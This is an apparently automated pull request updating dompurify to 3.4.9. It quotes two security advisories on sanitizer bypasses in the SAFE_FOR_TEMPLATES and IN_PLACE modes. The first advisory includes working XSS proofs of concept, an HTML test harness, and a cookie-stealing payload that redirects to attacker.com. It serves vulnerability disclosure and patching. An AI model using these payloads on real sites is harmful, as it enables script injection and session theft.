Update npm package dompurify to v3.4.9 [SECURITY]

[hash-worker]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
dompurify	3.4.0 → 3.4.9

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

GHSA-gvmj-g25r-r7wr

Summary

When DOMPurify is configured with both SAFE_FOR_TEMPLATES: true and RETURN_DOM: true (or IN_PLACE: true), an attacker can inject template expressions, such as ${evil}, {{evil}}, or <%evil%>, that survive the sanitization pass inside <template> element content. This bypasses the explicit purpose of SAFE_FOR_TEMPLATES, which is to prevent template engine evaluation of user-supplied content.

Note: The string output path is not affected. Only the DOM return paths (RETURN_DOM: true, RETURN_DOM_FRAGMENT: true, IN_PLACE: true) are vulnerable.

---

Description

Background

SAFE_FOR_TEMPLATES is designed to strip {{ }}, ${ }, and <% %> expressions from sanitized output so that downstream template engines do not evaluate user-controlled content. The feature operates through two mechanisms:

1. Per-node scrubbing (_sanitizeElements, src/purify.ts:1403), scrubs individual text nodes during the main sanitization walk.
2. Final normalization pass (_scrubTemplateExpressions, src/purify.ts:1115), calls node.normalize() to merge adjacent text nodes, then walks the merged nodes and strips any expressions that only appeared after merging.

The Gap

_scrubTemplateExpressions uses a standard NodeIterator rooted at the output body:

// src/purify.ts:1117
const walker = createNodeIterator.call(
  node.ownerDocument || node,
  node,
  NodeFilter.SHOW_TEXT | NodeFilter.SHOW_COMMENT | ...,
  null
);

Per the DOM specification, a NodeIterator does not descend into <template>.content. The template element's content is a separate DocumentFragment that lives outside the normal child-node tree. For the same reason, node.normalize() (called on line 1116) also does not normalize text nodes inside <template>.content.

This means the final normalization and scrub pass, the only pass that catches expressions formed by merging split text nodes, never runs on <template> content.

How Split Text Nodes Are Created

When DOMPurify removes a disallowed element with KEEP_CONTENT: true (the default), it moves the element's text children into the parent node. This is the standard code path at src/purify.ts:1361–1373:

if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
  const parentNode = getParentNode(currentNode);
  const childNodes = getChildNodes(currentNode);
  if (childNodes && parentNode) {
    for (let i = childCount - 1; i >= 0; --i) {
      const childClone = cloneNode(childNodes[i], true);
      parentNode.insertBefore(childClone, getNextSibling(currentNode));
    }
  }
}

If the removed elements were adjacent siblings inside <template> content, their extracted text nodes end up as adjacent text nodes in the template content fragment. Each individual text node is scrubbed by _sanitizeElements, but since $ and {evil} do not match any expression regex on their own, neither is modified.

The code comment at src/purify.ts:1100 explicitly acknowledges the threat class:

"which only form after text-node normalization (e.g. fragments split across stripped elements) cannot survive into a template-evaluating framework."

The implementation guards against this on the main body, but the guard is not applied to <template> content.

---

Proof of Concept

Why the Split Works

The bypass relies on splitting ${...} across two adjacent custom elements so that neither fragment matches any DOMPurify regex on its own:

Fragment	Against TMPLIT_EXPR /\${[\w\W]*/g	Against MUSTACHE_EXPR /{{[\w\W]*|^[\w\W]*}}/g	Result
$	Requires ${ - no { follows	No {{ or }}	Survives
{alert(document.domain)}	Requires leading $ - absent	No {{, ends with single } not }}	Survives
${alert(document.domain)}	Full match - would be stripped	-	Stripped if seen whole

DOMPurify only sees each fragment in isolation. It never merges them before checking, so the expression is never detected.

---

PoC 1 - XSS via alert() (baseline confirmation)

// Attacker input - splits "${alert(document.domain)}" across two custom elements.
// Custom elements are not in DOMPurify's default ALLOWED_TAGS and are removed,
// but their text content is kept (KEEP_CONTENT: true is the default).
const dirty =
  '<template>' +
    '<x-split-1>$</x-split-1>' +
    '<x-split-2>{alert(document.domain)}</x-split-2>' +
  '</template>';

// Developer sanitizes with SAFE_FOR_TEMPLATES, trusting it strips ${...}
const sanitized = DOMPurify.sanitize(dirty, {
  RETURN_DOM: true,
  SAFE_FOR_TEMPLATES: true,
});

// Inspect what survived inside the <template>
const tmpl = sanitized.querySelector('template');
console.log([...tmpl.content.childNodes].map(n => n.nodeValue));
// ["$", "{alert(document.domain)}"]  <-- two separate text nodes, both "clean"

// Frameworks (lit-html, Angular, custom renderers) routinely call normalize()
// before reading template content. This merges the adjacent nodes:
tmpl.content.normalize();
console.log(tmpl.content.textContent);
// "${alert(document.domain)}"  <-- fully formed expression, past the sanitizer

// Any template-literal evaluator now fires XSS:
const expr = tmpl.content.textContent;
new Function(`return \`${expr}\``)();
// !! alert(document.domain) executes !!

---

PoC 2 - Session Hijacking via cookie exfiltration

// Splits "${document.location='//attacker.com/?c='+document.cookie}"
// "{document.location=...}" ends with a single "}" — does NOT match
// MUSTACHE_EXPR's "^[\w\W]*}}" (requires double "}}"), so it survives.
const dirty =
  '<template>' +
    '<x-a>$</x-a>' +
    '<x-b>{document.location="//attacker.com/?c="+document.cookie}</x-b>' +
  '</template>';

const sanitized = DOMPurify.sanitize(dirty, {
  RETURN_DOM: true,
  SAFE_FOR_TEMPLATES: true,
});

const tmpl = sanitized.querySelector('template');
tmpl.content.normalize();

console.log(tmpl.content.textContent);
// "${document.location="//attacker.com/?c="+document.cookie}"

// Template engine evaluates it - victim's browser makes the request:
new Function(`return \`${tmpl.content.textContent}\``)();
// !! Redirects victim to attacker.com with their full cookie string !!
// e.g. https://attacker.com/?c=session=abc123;auth_token=xyz789

---

PoC 3 - End-to-end: realistic application context

This shows the full path in an application that uses DOMPurify to sanitize user-submitted rich text before rendering it with a custom template engine:

<!-- index.html - the vulnerable application -->
<div id="output"></div>
<script type="module">
  import DOMPurify from './dist/purify.es.mjs';

  // Simulates fetching and rendering user-submitted comment
  async function renderComment(userHtml) {
    // Developer correctly uses SAFE_FOR_TEMPLATES to protect the template engine
    const dom = DOMPurify.sanitize(userHtml, {
      RETURN_DOM: true,
      SAFE_FOR_TEMPLATES: true,
    });

    // Application iterates <template> elements and evaluates their content
    // (common pattern in component-based frameworks)
    dom.querySelectorAll('template').forEach(tmpl => {
      tmpl.content.normalize(); // standard DOM housekeeping
      const content = tmpl.content.textContent;

      // Application uses template literals to interpolate user content into UI
      const rendered = new Function('user', `return \`${content}\``)({ name: 'World' });
      document.getElementById('output').innerHTML += rendered;
    });
  }

  // Attacker-supplied comment content
  const attackerComment =
    '<template>' +
      '<x-a>$</x-a>' +
      '<x-b>{alert("XSS: " + document.cookie)}</x-b>' +
    '</template>';

  // Developer believes SAFE_FOR_TEMPLATES makes this safe — it does not for RETURN_DOM
  renderComment(attackerComment);
  // !! XSS fires, alert pops with session cookies !!
</script>

Observed output: alert("XSS: " + document.cookie) executes in the victim's browser context, leaking session tokens to the attacker.

---

PoC 4 - IN_PLACE mode (DOM input path)

// Applicable when the application sanitizes DOM nodes directly
// (e.g., content loaded into an iframe or received from a WebSocket)

const container = document.createElement('div');
const tmpl = document.createElement('template');

// Adjacent text nodes - these would never appear in HTML-parsed content,
// but CAN appear in programmatically constructed DOM or WebSocket messages
// that are deserialised into DOM nodes before sanitisation.
tmpl.content.appendChild(document.createTextNode('$'));
tmpl.content.appendChild(document.createTextNode('{alert(document.domain)}'));
container.appendChild(tmpl);

// Sanitize in-place with SAFE_FOR_TEMPLATES - expected to strip all ${...}
DOMPurify.sanitize(container, { IN_PLACE: true, SAFE_FOR_TEMPLATES: true });

// Neither text node was modified - each passed the regex check individually
container.querySelector('template').content.normalize();
console.log(container.querySelector('template').content.textContent);
// "${alert(document.domain)}"  <-- survived in-place sanitization

new Function(`return \`${container.querySelector('template').content.textContent}\``)();
// !! XSS fires !!

HTML File for testing

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>DOMPurify SAFE_FOR_TEMPLATES Bypass - PoC</title>
  <script src="dist/purify.js"></script>
  <style>
    * { box-sizing: border-box; margin: 0; padding: 0; }
    body {
      font-family: 'Segoe UI', system-ui, sans-serif;
      background: #&#8203;0d1117;
      color: #e6edf3;
      padding: 32px;
    }
    h1 { font-size: 1.4rem; color: #f85149; margin-bottom: 6px; }
    .subtitle { color: #&#8203;8b949e; font-size: 0.9rem; margin-bottom: 32px; }
    .card {
      background: #&#8203;161b22;
      border: 1px solid #&#8203;30363d;
      border-radius: 8px;
      margin-bottom: 24px;
      overflow: hidden;
    }
    .card-header {
      display: flex;
      align-items: center;
      gap: 10px;
      padding: 14px 20px;
      border-bottom: 1px solid #&#8203;30363d;
      background: #&#8203;1c2128;
    }
    .badge {
      font-size: 0.72rem;
      font-weight: 700;
      padding: 2px 8px;
      border-radius: 4px;
      text-transform: uppercase;
      letter-spacing: 0.05em;
    }
    .badge-run    { background: #&#8203;1f6feb; color: #fff; }
    .badge-pass   { background: #&#8203;238636; color: #fff; }
    .badge-fail   { background: #da3633; color: #fff; }
    .badge-warn   { background: #&#8203;9e6a03; color: #fff; }
    .card-title   { font-size: 0.95rem; font-weight: 600; }
    .card-body    { padding: 20px; }
    label         { font-size: 0.78rem; color: #&#8203;8b949e; display: block; margin-bottom: 6px; }
    pre {
      background: #&#8203;0d1117;
      border: 1px solid #&#8203;30363d;
      border-radius: 6px;
      padding: 14px;
      font-size: 0.82rem;
      line-height: 1.6;
      overflow-x: auto;
      margin-bottom: 14px;
      white-space: pre-wrap;
      word-break: break-all;
    }
    pre.result    { border-color: #&#8203;238636; background: #&#8203;0a1a0f; }
    pre.escaped   { border-color: #da3633; background: #&#8203;1a0a0a; }
    pre.highlight { border-color: #f85149; color: #f85149; font-weight: bold; }
    .grid { display: grid; grid-template-columns: 1fr 1fr; gap: 14px; }
    @&#8203;media (max-width: 700px) { .grid { grid-template-columns: 1fr; } }
    .arrow {
      text-align: center;
      font-size: 1.4rem;
      color: #&#8203;8b949e;
      margin: 4px 0;
    }
    .xss-banner {
      display: none;
      background: #da3633;
      color: #fff;
      text-align: center;
      padding: 16px;
      font-size: 1.1rem;
      font-weight: 700;
      border-radius: 6px;
      margin-bottom: 24px;
      letter-spacing: 0.03em;
    }
    button {
      background: #&#8203;238636;
      color: #fff;
      border: none;
      padding: 10px 22px;
      border-radius: 6px;
      font-size: 0.9rem;
      font-weight: 600;
      cursor: pointer;
      margin-right: 10px;
      margin-bottom: 8px;
    }
    button:hover { background: #&#8203;2ea043; }
    button.danger { background: #da3633; }
    button.danger:hover { background: #f85149; }
    .note {
      background: #&#8203;161b22;
      border-left: 3px solid #&#8203;9e6a03;
      padding: 12px 16px;
      font-size: 0.82rem;
      color: #e3b341;
      border-radius: 0 6px 6px 0;
      margin-top: 14px;
    }
    #log {
      background: #&#8203;0d1117;
      border: 1px solid #&#8203;30363d;
      border-radius: 6px;
      padding: 14px;
      font-size: 0.8rem;
      font-family: monospace;
      min-height: 60px;
      max-height: 300px;
      overflow-y: auto;
      line-height: 1.8;
    }
    .log-ok   { color: #&#8203;3fb950; }
    .log-fail { color: #f85149; }
    .log-info { color: #&#8203;8b949e; }
    .log-warn { color: #e3b341; }
  </style>
</head>
<body>

  <h1>🔴 DOMPurify 3.4.7 - SAFE_FOR_TEMPLATES Bypass</h1>
  <p class="subtitle">
    CVE candidate · Template expression injection via &lt;template&gt; content ·
    Affects: <code>RETURN_DOM + SAFE_FOR_TEMPLATES</code> and <code>IN_PLACE + SAFE_FOR_TEMPLATES</code>
  </p>

  <div id="xss-banner" class="xss-banner">
    ⚠️ XSS CONFIRMED - Expression executed in this page's context
  </div>

  <!-- ── Controls ─────────────────────────────────────────── -->
  <div class="card">
    <div class="card-header">
      <span class="badge badge-run">Controls</span>
      <span class="card-title">Run individual test cases</span>
    </div>
    <div class="card-body">
      <button onclick="runAll()">▶ Run all tests</button>
      <button onclick="runPoC1()">PoC 1 - alert()</button>
      <button onclick="runPoC2()">PoC 2 - cookie exfil</button>
      <button onclick="runPoC3()">PoC 3 - IN_PLACE</button>
      <button onclick="runControl()">Control - string output (should block)</button>
      <div class="note">
        PoC 1 uses <code>confirm()</code> instead of <code>alert()</code> so the page
        doesn't need a dismiss click to continue. Watch the red banner at the top.
      </div>
    </div>
  </div>

  <!-- ── PoC 1 ─────────────────────────────────────────────── -->
  <div class="card" id="card-poc1">
    <div class="card-header">
      <span class="badge badge-run" id="badge-poc1">PENDING</span>
      <span class="card-title">PoC 1 - XSS via confirm() · RETURN_DOM mode</span>
    </div>
    <div class="card-body">
      <div class="grid">
        <div>
          <label>ATTACKER INPUT - splits <code>${"{confirm(...)}"}</code> across two custom elements</label>
          <pre id="input-poc1"></pre>
        </div>
        <div>
          <label>AFTER DOMPurify.sanitize() - what survived in template.content</label>
          <pre class="result" id="nodes-poc1"></pre>
        </div>
      </div>
      <div class="arrow">↓ template.content.normalize() ↓</div>
      <label>MERGED TEXT NODE - fully formed expression after normalization</label>
      <pre class="highlight" id="merged-poc1"></pre>
      <label>EXECUTION RESULT</label>
      <pre id="exec-poc1">Not run yet</pre>
    </div>
  </div>

  <!-- ── PoC 2 ─────────────────────────────────────────────── -->
  <div class="card" id="card-poc2">
    <div class="card-header">
      <span class="badge badge-run" id="badge-poc2">PENDING</span>
      <span class="card-title">PoC 2 - Cookie exfiltration · RETURN_DOM mode</span>
    </div>
    <div class="card-body">
      <div class="grid">
        <div>
          <label>ATTACKER INPUT - exfil payload split across custom elements</label>
          <pre id="input-poc2"></pre>
        </div>
        <div>
          <label>INDIVIDUAL TEXT NODES after sanitization (each "clean")</label>
          <pre class="result" id="nodes-poc2"></pre>
        </div>
      </div>
      <div class="arrow">↓ template.content.normalize() ↓</div>
      <label>MERGED EXPRESSION - what a template engine would evaluate</label>
      <pre class="highlight" id="merged-poc2"></pre>
      <label>SIMULATED EXECUTION (fetch URL that would be called)</label>
      <pre id="exec-poc2">Not run yet</pre>
      <div class="note">
        Real execution would redirect the victim to
        <code>attacker.com</code> carrying the session cookie.
        This PoC constructs the URL without actually sending it.
      </div>
    </div>
  </div>

  <!-- ── PoC 3 ─────────────────────────────────────────────── -->
  <div class="card" id="card-poc3">
    <div class="card-header">
      <span class="badge badge-run" id="badge-poc3">PENDING</span>
      <span class="card-title">PoC 3 - XSS · IN_PLACE mode (DOM node input)</span>
    </div>
    <div class="card-body">
      <div class="grid">
        <div>
          <label>ATTACKER PROVIDES - a DOM node with programmatically split text nodes</label>
          <pre id="input-poc3"></pre>
        </div>
        <div>
          <label>AFTER IN_PLACE sanitization - text nodes unchanged</label>
          <pre class="result" id="nodes-poc3"></pre>
        </div>
      </div>
      <div class="arrow">↓ template.content.normalize() ↓</div>
      <label>MERGED EXPRESSION</label>
      <pre class="highlight" id="merged-poc3"></pre>
      <label>EXECUTION RESULT</label>
      <pre id="exec-poc3">Not run yet</pre>
    </div>
  </div>

  <!-- ── Control ───────────────────────────────────────────── -->
  <div class="card" id="card-ctrl">
    <div class="card-header">
      <span class="badge badge-run" id="badge-ctrl">PENDING</span>
      <span class="card-title">Control - string output (default) MUST block the payload</span>
    </div>
    <div class="card-body">
      <label>Same attacker input, but sanitized WITHOUT RETURN_DOM (string output path)</label>
      <pre id="input-ctrl"></pre>
      <div class="arrow">↓ DOMPurify.sanitize() - string path hits the regex scrub at line 2067 ↓</div>
      <label>OUTPUT STRING - expression should be stripped</label>
      <pre id="output-ctrl">Not run yet</pre>
      <div class="note">
        The string output path is NOT vulnerable because
        <code>body.innerHTML</code> serialises the template content into a
        flat string where the full <code>${"{...}"}</code> expression is visible
        and the final regex scrub catches it.
      </div>
    </div>
  </div>

  <!-- ── Log ───────────────────────────────────────────────── -->
  <div class="card">
    <div class="card-header">
      <span class="badge badge-run">Log</span>
      <span class="card-title">Test output</span>
    </div>
    <div class="card-body">
      <div id="log"></div>
    </div>
  </div>

<script>
// ── Helpers ────────────────────────────────────────────────────────────────

let xssConfirmed = false;

function log(msg, type = 'info') {
  const el = document.getElementById('log');
  const line = document.createElement('div');
  line.className = 'log-' + type;
  line.textContent = '[' + new Date().toLocaleTimeString() + '] ' + msg;
  el.appendChild(line);
  el.scrollTop = el.scrollHeight;
}

function setBadge(id, status) {
  const el = document.getElementById('badge-' + id);
  el.textContent = status;
  el.className = 'badge ' + {
    PASS: 'badge-fail',   // "PASS" here means the attack succeeded (bad for security)
    BLOCK: 'badge-pass',  // "BLOCK" means DOMPurify correctly blocked it
    PENDING: 'badge-run',
    ERROR: 'badge-warn',
  }[status];
}

function markXSS(poc) {
  if (!xssConfirmed) {
    xssConfirmed = true;
    document.getElementById('xss-banner').style.display = 'block';
  }
  log('🔴 XSS CONFIRMED in ' + poc + ' - expression executed in page context', 'fail');
}

// ── PoC 1: RETURN_DOM + alert ──────────────────────────────────────────────

function runPoC1() {
  log('Running PoC 1 - RETURN_DOM + confirm()...', 'info');

  // IMPORTANT:
  // Build a REAL template DOM node with split TEXT nodes.
  // HTML parsing would merge adjacent text automatically,
  // so we construct the DOM programmatically.

  const container = document.createElement('div');
  const tmpl = document.createElement('template');

  tmpl.content.appendChild(document.createTextNode('$'));
  tmpl.content.appendChild(
    document.createTextNode(
      '{confirm("XSS - DOMPurify SAFE_FOR_TEMPLATES bypass\\nExpression executed in: " + document.domain)}'
    )
  );

  container.appendChild(tmpl);

  document.getElementById('input-poc1').textContent =
    'template.content.childNodes[0].data = "$"\\n' +
    'template.content.childNodes[1].data = "{confirm(...)}"';

  // Sanitize the DOM node itself
  const sanitized = DOMPurify.sanitize(container, {
    RETURN_DOM: true,
    SAFE_FOR_TEMPLATES: true,
  });

  const tmplAfter = sanitized.querySelector('template');

  if (!tmplAfter) {
    document.getElementById('exec-poc1').textContent =
      'Template element removed during sanitization';
    setBadge('poc1', 'ERROR');
    return;
  }

  const nodesBefore = [...tmplAfter.content.childNodes].map(
    n => JSON.stringify(n.nodeValue)
  );

  document.getElementById('nodes-poc1').textContent =
    'childNodes[0].data = ' + nodesBefore[0] + '\\n' +
    'childNodes[1].data = ' + nodesBefore[1] + '\\n\\n' +
    '→ Neither fragment matched individually.';

  log(
    'PoC 1: Text nodes after sanitization: ' +
    nodesBefore.join(', '),
    'warn'
  );

  // Merge text nodes
  tmplAfter.content.normalize();

  const merged = tmplAfter.content.textContent;

  document.getElementById('merged-poc1').textContent = merged;

  log('PoC 1: After normalize() - merged text: ' + merged, 'warn');

  try {
    const result = new Function('return `' + merged + '`')();

    document.getElementById('exec-poc1').textContent =
      '✔ Expression executed successfully\\n' +
      'Returned: ' + result;

    setBadge('poc1', 'PASS');
    markXSS('PoC 1');

  } catch (e) {
    document.getElementById('exec-poc1').textContent =
      'Error: ' + e.message;

    setBadge('poc1', 'ERROR');

    log('PoC 1 error: ' + e.message, 'warn');
  }
}

// ── PoC 2: cookie exfiltration ─────────────────────────────────────────────

function runPoC2() {
  log('Running PoC 2 - cookie exfiltration...', 'info');

  // Fake cookie for demonstration
  document.cookie = 'session=DEADBEEF_SECRET_TOKEN; path=/';

  // IMPORTANT:
  // Build REAL split text nodes programmatically.
  // Do NOT rely on HTML parsing.

  const container = document.createElement('div');
  const tmpl = document.createElement('template');

  tmpl.content.appendChild(document.createTextNode('$'));

  tmpl.content.appendChild(
    document.createTextNode(
      '{document.location="//attacker.com/steal?c="+document.cookie}'
    )
  );

  container.appendChild(tmpl);

  document.getElementById('input-poc2').textContent =
    'template.content.childNodes[0].data = "$"\\n' +
    'template.content.childNodes[1].data = "{document.location=...}"';

  // Sanitize DOM node
  const sanitized = DOMPurify.sanitize(container, {
    RETURN_DOM: true,
    SAFE_FOR_TEMPLATES: true,
  });

  const tmplAfter = sanitized.querySelector('template');

  if (!tmplAfter) {
    document.getElementById('exec-poc2').textContent =
      'Template element removed during sanitization';

    setBadge('poc2', 'ERROR');

    log('PoC 2: template element missing after sanitize()', 'warn');

    return;
  }

  const nodes = [...tmplAfter.content.childNodes].map(
    n => JSON.stringify(n.nodeValue)
  );

  document.getElementById('nodes-poc2').textContent =
    'Node 0: ' + nodes[0] + '\\n' +
    'Node 1: ' + nodes[1] + '\\n\\n' +
    '→ Neither fragment individually matches template-expression regexes.';

  log('PoC 2: Nodes after sanitize: ' + nodes.join(', '), 'warn');

  // Merge adjacent text nodes
  tmplAfter.content.normalize();

  const merged = tmplAfter.content.textContent;

  document.getElementById('merged-poc2').textContent = merged;

  log('PoC 2: Merged expression: ' + merged, 'warn');

  // Simulate framework evaluation
  try {
    new Function('return `' + merged + '`')();

    const cookieValue = document.cookie;

    const stealUrl =
      '//attacker.com/steal?c=' +
      encodeURIComponent(cookieValue);

    document.getElementById('exec-poc2').textContent =
      '✔ Expression successfully evaluated\\n\\n' +
      'Would redirect victim to:\\n' +
      stealUrl + '\\n\\n' +
      'Cookie exposed:\\n' +
      cookieValue;

    setBadge('poc2', 'PASS');

    markXSS('PoC 2');

    log('PoC 2: Would exfiltrate cookie → ' + stealUrl, 'fail');

  } catch (e) {
    document.getElementById('exec-poc2').textContent =
      'Error: ' + e.message;

    setBadge('poc2', 'ERROR');

    log('PoC 2 error: ' + e.message, 'warn');
  }
}
// ── PoC 3: IN_PLACE mode ───────────────────────────────────────────────────

function runPoC3() {
  log('Running PoC 3 - IN_PLACE mode...', 'info');

  // Build DOM node manually (simulates attacker-controlled DOM input,
  // e.g. content parsed from a WebSocket message or an iframe)
  const container = document.createElement('div');
  const tmplEl = document.createElement('template');

  // Two separate text nodes - HTML parser merges them, but programmatic
  // DOM construction keeps them split. This is the IN_PLACE attack surface.
  tmplEl.content.appendChild(document.createTextNode('$'));
  tmplEl.content.appendChild(document.createTextNode('{confirm("XSS via IN_PLACE - domain: " + document.domain)}'));
  container.appendChild(tmplEl);

  document.getElementById('input-poc3').textContent =
    '// Programmatically constructed DOM node:\n' +
    'template.content.childNodes[0].data = "$"\n' +
    'template.content.childNodes[1].data = "{confirm(\\"XSS via IN_PLACE...\\")}"\n\n' +
    '// Passed to DOMPurify.sanitize(container, { IN_PLACE: true, SAFE_FOR_TEMPLATES: true })';

  // Sanitize IN_PLACE - SAFE_FOR_TEMPLATES should strip the expression
  DOMPurify.sanitize(container, {
    IN_PLACE: true,
    SAFE_FOR_TEMPLATES: true,
  });

  const tmplAfter = container.querySelector('template');
  const nodesAfter = [...tmplAfter.content.childNodes].map(n => n.nodeValue);
  document.getElementById('nodes-poc3').textContent =
    'childNodes[0].data = ' + JSON.stringify(nodesAfter[0]) + '\n' +
    'childNodes[1].data = ' + JSON.stringify(nodesAfter[1]) + '\n\n' +
    '→ _scrubTemplateExpressions() did not enter template.content\n' +
    '→ Both nodes unchanged after sanitization.';

  log('PoC 3: Nodes after IN_PLACE sanitize: ' + nodesAfter.map(n => JSON.stringify(n)).join(', '), 'warn');

  tmplAfter.content.normalize();
  const merged = tmplAfter.content.textContent;
  document.getElementById('merged-poc3').textContent = merged;

  log('PoC 3: Merged: ' + merged, 'warn');

  try {
    const result = new Function('return `' + merged + '`')();
    document.getElementById('exec-poc3').textContent =
      '✔ new Function() returned: ' + result + '\n' +
      'confirm() dialog shown. XSS confirmed via IN_PLACE mode.';
    setBadge('poc3', 'PASS');
    markXSS('PoC 3');
  } catch (e) {
    document.getElementById('exec-poc3').textContent = 'Error: ' + e.message;
    setBadge('poc3', 'ERROR');
    log('PoC 3 error: ' + e.message, 'warn');
  }
}

// ── Control: string output must block ─────────────────────────────────────

function runControl() {
  log('Running control - string output path (should block)...', 'info');

  const dirty =
    '<template>' +
      '<x-split-1>$</x-split-1>' +
      '<x-split-2>{confirm("this should never fire")}</x-split-2>' +
    '</template>';

  document.getElementById('input-ctrl').textContent = dirty;

  // Default string output - NOT using RETURN_DOM
  const sanitized = DOMPurify.sanitize(dirty, {
    SAFE_FOR_TEMPLATES: true,
    // RETURN_DOM intentionally omitted - string path is safe
  });

  document.getElementById('output-ctrl').textContent = sanitized;

  const blocked = !sanitized.includes('${') && !sanitized.includes('{confirm');
  if (blocked) {
    setBadge('ctrl', 'BLOCK');
    log('Control: String output correctly stripped the expression. Output: ' + sanitized, 'ok');
  } else {
    setBadge('ctrl', 'PASS'); // unexpected
    log('Control: UNEXPECTED - expression survived string output path: ' + sanitized, 'fail');
  }
}

// ── Run all ────────────────────────────────────────────────────────────────

function runAll() {
  document.getElementById('log').innerHTML = '';
  xssConfirmed = false;
  document.getElementById('xss-banner').style.display = 'none';
  log('=== Starting full test run ===', 'info');
  runPoC1();
  runPoC2();
  runPoC3();
  runControl();
  log('=== Test run complete ===', 'info');
}
</script>

</body>
</html>

---

Root Cause

_scrubTemplateExpressions (src/purify.ts:1115) does not recurse into <template>.content:

const _scrubTemplateExpressions = function (node: Element): void {
  node.normalize(); // Does NOT normalize inside <template>.content (DOM spec)
  const walker = createNodeIterator.call(
    node.ownerDocument || node,
    node,            // NodeIterator does NOT enter <template>.content
    NodeFilter.SHOW_TEXT | NodeFilter.SHOW_COMMENT |
    NodeFilter.SHOW_CDATA_SECTION | NodeFilter.SHOW_PROCESSING_INSTRUCTION,
    null
  );
  // Scrubs nodes it finds, but never sees <template> content
};

The fix is to extend _scrubTemplateExpressions to explicitly recurse into <template>.content, mirroring the approach already used by _sanitizeShadowDOM (src/purify.ts:1753):

if (_isDocumentFragment(shadowNode.content)) {
  _sanitizeShadowDOM(shadowNode.content); // already handles recursion
}

Suggested Patch Direction

const _scrubTemplateExpressions = function (node: Element): void {
  node.normalize();
  const walker = createNodeIterator.call( /* existing args */ );

  // ... existing scrub loop ...

  // NEW: recurse into <template>.content, mirroring _sanitizeShadowDOM
  const templates = (node as Element).querySelectorAll?.('template') ?? [];
  arrayForEach(Array.from(templates), (tmpl: HTMLTemplateElement) => {
    if (_isDocumentFragment(tmpl.content)) {
      _scrubTemplateExpressions(tmpl.content as unknown as Element);
    }
  });
};

---

Impact

Who is affected: Applications that use DOMPurify with SAFE_FOR_TEMPLATES: true combined with RETURN_DOM: true, RETURN_DOM_FRAGMENT: true, or IN_PLACE: true, whose downstream template engine processes <template> element content.

What an attacker can achieve: Inject arbitrary template expressions (${...}, {{...}}, <%...%>) into the sanitized DOM output inside <template> elements. If the consuming template engine evaluates these expressions, this leads to template injection, which in server-side contexts can escalate to Remote Code Execution and in client-side contexts to Cross-Site Scripting.

Preconditions for Exploitation

Precondition	Notes
SAFE_FOR_TEMPLATES: true	Non-default - must be explicitly set
RETURN_DOM: true or IN_PLACE: true	Non-default - must be explicitly set
Template engine processes <template>.content	Application-dependent

What Is NOT Affected

The string output path (default) is not affected. The final regex scrub at src/purify.ts:2067–2071 operates on the serialized HTML string, where the injected expression is visible and stripped:

// src/purify.ts:2067 - only runs on string output, not DOM output
if (SAFE_FOR_TEMPLATES) {
  arrayForEach([MUSTACHE_EXPR, ERB_EXPR, TMPLIT_EXPR], (expr: RegExp) => {
    serializedHTML = stringReplace(serializedHTML, expr, ' ');
  });
}

CVE-2026-49459

IN_PLACE mode preserves attributes of a clobbered root element, allowing XSS via attacker-controlled root DOM

CWE: CWE-79 (XSS — Improper Neutralization of Input During Web Page Generation) via CWE-693 (Protection Mechanism Failure — silent no-op when _forceRemove is called on a parent-less node)

Summary

When DOMPurify.sanitize(root, { IN_PLACE: true }) is called and root is a <form> whose own attributes carry an event handler (onmouseover, onfocus, onclick, etc.), a single descendant element with a name= attribute matching any of the property names _isClobbered checks (nodeName, setAttribute, namespaceURI, insertBefore, hasChildNodes, childNodes) is sufficient to bypass attribute sanitization on the root. _forceRemove silently no-ops because the root has no parent; the iterator drives on to _sanitizeAttributes, which early-returns on clobbered nodes — and the event handler attribute is never inspected. The sanitized return is the same root, with the handler live.

This affects current main at 89da34e (the just-landed DOM-clobbering hardening fix at 89da34e addressed _sanitizeAttachedShadowRoots walk traversal, not the main _sanitizeElements / _sanitizeAttributes pipeline against the iterator-root node).

Affected

• DOMPurify ≤ 3.4.5, including main at 89da34e03ec17868e561f87f3747a9371b61a9e7
• Any caller that does DOMPurify.sanitize(node, { IN_PLACE: true }) where node is built from untrusted HTML (e.g., parsed via createElement('template').innerHTML = dirty then template.content.firstElementChild handed in)

Not affected:

• String-input DOMPurify.sanitize(dirtyString) — the library builds the DOM itself inside _initDocument, the root is the cleanly-created document body, and clobber-named children of the body cannot shadow body named properties (HTMLBodyElement does not carry [LegacyOverrideBuiltIns])
• IN_PLACE where the root is not an HTMLFormElement
• IN_PLACE where the attacker cannot place a clobber-named child inside the root

Vulnerability details

Code paths

[A] — _forceRemove at src/purify.ts:930-939:

const _forceRemove = function (node: Node): void {
  arrayPush(DOMPurify.removed, { element: node });
  try {
    // eslint-disable-next-line unicorn/prefer-dom-node-remove
    getParentNode(node).removeChild(node);   // [A1] throws when getParentNode returns null
  } catch (_) {
    remove(node);                             // [A2] WebIDL Node.remove() — spec-defined no-op
  }                                           //      when the node has no parent
};

When the iterator-root has no parent (the standard IN_PLACE case where the caller hands in a detached node), getParentNode(node) returns null, null.removeChild(node) throws, the catch falls to remove(node) — which per WebIDL is Element.prototype.remove.call(node), and per spec does nothing if the node has no parent. Nothing about _forceRemove's contract acknowledges this — the function appears to its callers as "the node is gone now," but the node is still in place.

[B] — _sanitizeAttributes at src/purify.ts:1490-1492:

const _sanitizeAttributes = function (currentNode: Element): void {
  _executeHooks(hooks.beforeSanitizeAttributes, currentNode, null);

  const { attributes } = currentNode;

  /* Check if we have attributes; if not we might have a text node */
  if (!attributes || _isClobbered(currentNode)) {
    return;                                   // [B] silently skips ALL attribute checks
  }                                           //     for clobbered nodes
  ...
};

The skip at [B] is deliberate — the intent is to avoid touching nodes the library has already decided to discard. The invariant the comment implies is "if _isClobbered, then _sanitizeElements already removed this node, so we will never reach _sanitizeAttributes on it." That invariant holds for every non-root node (their _forceRemove succeeds in detaching them), but fails for the iterator root in IN_PLACE mode.

The mismatch is between [A] and [B]: [A] assumes "removal" means the node will not be observed again, and [B] assumes any clobbered node it sees has already been removed. Neither holds for the iterator root. A correct guard would either make _forceRemove fail loudly on parent-less nodes (so the caller can bail out of IN_PLACE entirely) or have _sanitizeAttributes strip attributes from clobbered roots before returning.

Iterator call site

src/purify.ts:1850-1864 ignores the boolean return value of _sanitizeElements:

